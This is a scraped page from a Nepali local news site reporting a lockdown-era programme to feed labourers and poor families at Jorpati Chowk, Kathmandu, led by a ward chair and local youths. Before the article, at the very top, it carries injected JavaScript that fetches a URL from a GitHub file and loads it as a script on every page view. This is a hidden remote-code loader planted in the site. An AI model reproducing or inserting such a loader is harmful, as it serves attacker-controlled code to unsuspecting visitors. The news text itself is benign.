;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); जोरपाटी चोकमा बैशाख १० गते देखि खाना खुवाइने – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • जोरपाटी चोकमा बैशाख १० गते देखि खाना खुवाइने
जुनेली बिशेष

जोरपाटी चोकमा बैशाख १० गते देखि खाना खुवाइने

बैशाख ८,

काठमाडौँ | गोकर्नेश्वोर नगरपालिका वडा नं ५ का वडा अध्यक्ष नारायण बहादुर सुबेदी को नेतृत्व र जोरपाटीका युवा हरुको संयुक्त प्रयासमा बैशाख १० गते भोलि देखि  जोरपाटी चोकमा मजदुर र बिपन्न परिवारलाई खाना खुवाउने कार्यक्रम राखिएको हो |

कोरोना भाइरसको कारण लक डाउन भए संगै देश भरिका जनता हरु घर भित्रै बसेका छन् | काठमाडौँ बाट घर जाने मजदुर तथा बिपन्न वर्ग हरु जो एक छाक खानाको लागि काम गर्छन तिनी हरुको भोकलाई ध्यानमा राखेर केहि समय आगाडी वडाको तर्फबाट राहात बाडियो तर यो भन्दा खाना पकाएर खुवाउने कार्य चाहि प्रभावकारी देखिएको हुनाले यो कार्यक्रम गर्न लागिएको हो | यो भन्दा अगाडी देखिनै वडा नङ ५ को नयाबस्ति  क्लबमा, बराल पम्प सुन्दर टोलमा, नारायानटारमा  खाना खुवाई रहेको छ

फेसबुक प्रतिक्रियाहरु